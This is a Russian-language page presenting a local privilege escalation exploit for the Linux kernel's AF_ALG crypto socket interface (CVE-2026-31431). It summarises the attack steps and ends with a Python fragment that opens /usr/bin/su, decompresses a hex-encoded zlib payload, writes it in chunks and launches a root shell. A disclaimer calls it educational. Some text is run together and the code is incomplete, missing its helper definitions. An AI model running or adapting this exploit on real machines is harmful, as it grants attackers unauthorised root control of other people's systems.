
Локальный эксплойт для повышения привилегий через CVE-2026-31431, использующий обработку сокетов AF_ALG AEAD для получения root-доступа к оболочке на уязвимых ядрах Linux.
CVE-2026-31431 — это уязвимость повышения привилегий в Linux, которая использует интерфейс AF_ALG (криптографический API ядра). Создавая вредоносное взаимодействие с сокетами AEAD (Authenticated Encryption with Associated Data), злоумышленник может повысить привилегии и выполнить код с правами root.
Эта уязвимость использует некорректную обработку криптографических операций сокетов, что позволяет контролируемо манипулировать памятью и в конечном итоге повышать привилегии.
/usr/bin/su)Эксплойт:
Создает сокет AF_ALG
Привязывается к:
authenc(hmac(sha256),cbc(aes))
Использует специально созданные полезные нагрузки через setsockopt и sendmsg
Вызывает непреднамеренное поведение ядра
Переходит в root-оболочку через:
g.system("su")
Ключевые индикаторы:
socket(38,5,0) → AF_ALGzlib)
**Отказ от ответственности: я не являюсь автором этого PoC. Он предназначен только для образовательных целей и тестирования в средах, где есть соответствующие разрешения. Автор/владелец не несет ответственности за любое неправомерное использование. **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")